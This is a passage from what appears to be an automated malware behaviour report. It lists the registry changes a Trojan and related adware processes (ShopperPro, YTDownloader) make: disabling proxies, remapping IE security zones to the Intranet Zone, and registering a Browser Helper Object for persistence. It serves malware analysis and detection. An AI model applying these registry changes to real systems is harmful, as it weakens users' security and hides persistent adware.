"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Programmable]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"MaxConnectionsPerServer"
"MaxConnectionsPer1_0Server"
The process YTDownloader.exe:2380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 26 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\YTDownloader]
"UserId" = "{A12A645F-7F13-46EC-98C0-57B180FEB515}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 76 00 AE B6 75 BE 07 79 46 61 9D 26 32 BA 12"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
[HKCU\Software\YTDownloader]
"UserId" = "{A12A645F-7F13-46EC-98C0-57B180FEB515}"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process tcpsvcs.exe:2296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 1E 69 E8 3F 7B ED 78 02 1A 3C CD 41 C7 29 1D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
The process ins_geforce.exe:2388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B 71 F1 15 68 F7 3C 38 93 E0 1D 2A 72 49 7E 5F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"c98dc9.exe" = "c98dc9"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The process ShopperPro.exe:2116 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\ShopperPro]
"ExeLocation" = "%Program Files%\ShopperPro"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\ShopperPro]
"ChromeExtID" = "ojhagnahfpegocdhlopgljpaafeogmcc"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\ShopperPro]
"CONFIGLOCATION" = "%Documents and Settings%\All Users\Application Data\ShopperPro"
[HKLM\SOFTWARE\ShopperPro\ExtraInfo]
"DBVersion" = "1.0.2.0"
[HKLM\SOFTWARE\ShopperPro]
"DBLocation" = "%Documents and Settings%\All Users\Application Data\ShopperPro"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\ShopperPro]
"Aff" = "obrdc"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\ShopperPro]
"Version" = "3.1.10955.2221"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\ShopperPro]
"ChromeExtFile" = "ShopperPro.crx"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 E4 A5 1B B5 0C 2C 37 01 2E 6A 7F 89 2B 00 8E"
[HKLM\SOFTWARE\ShopperPro]
"UserId" = "99999999-9999-4a59-bea0-eea83fb95fc9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "ShopperProBHO"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"NoExplore" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process c98dc9.exe:3000 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\InstalledBrowserExtensions\21836]
"70881" = "Ge-ForcePlus v3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"
[HKLM\SOFTWARE\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A 73 7F 05 BA 41 8B 25 CF 6B 52 D3 F0 4C 18 C2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\InstalledBrowserExtensions\21836]
"70881" = "Ge-ForcePlus v3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process ins_shopperpro.exe:1204 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC AA FC 22 DA B1 21 5C EE 94 D4 3D 19 97 AB 73"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process regsvr32.exe:2224 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\InprocServer32]
"(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll"
[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\TypeLib]
"(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"
[HKCR\ShopperPro.ShopperProBHO\CurVer]
"(Default)" = "ShopperPro.ShopperProBHO.1"
[HKCR\AppID\{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}]
"(Default)" = "ShopperPro"
[HKCR\AppID\ShopperPro.DLL]
"AppID" = "{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}"
[HKCR\ShopperPro.ShopperProBHO]
"(Default)" = "Shopper Pro"
[HKCR\ShopperPro.ShopperProBHO.1\CLSID]
"(Default)" = "{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}"
[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\ProgID]
"(Default)" = "ShopperPro.ShopperProBHO.1"
[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "Shopper Pro"
[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\TypeLib]
"Version" = "1.0"
[HKCR\ShopperPro.ShopperProBHO\CLSID]
"(Default)" = "{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}"
[HKCR\ShopperPro.ShopperProBHO.1]
"(Default)" = "Shopper Pro"
[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\HELPDIR]
"(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro"
[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0]
"(Default)" = "ShopperPro 1.0 Type Library"
[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 14 D9 41 FA 9F EF F0 15 E5 86 FB 85 31 55 E7"
[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\VersionIndependentProgID]
"(Default)" = "ShopperPro.ShopperProBHO"
[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\0\win32]
"(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll"
[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\TypeLib]
"(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"
[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}]
"(Default)" = "IShopperProBHO"
[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "ShopperProBHO"
"NoExplorer" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
The process %original file name%.exe:608 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
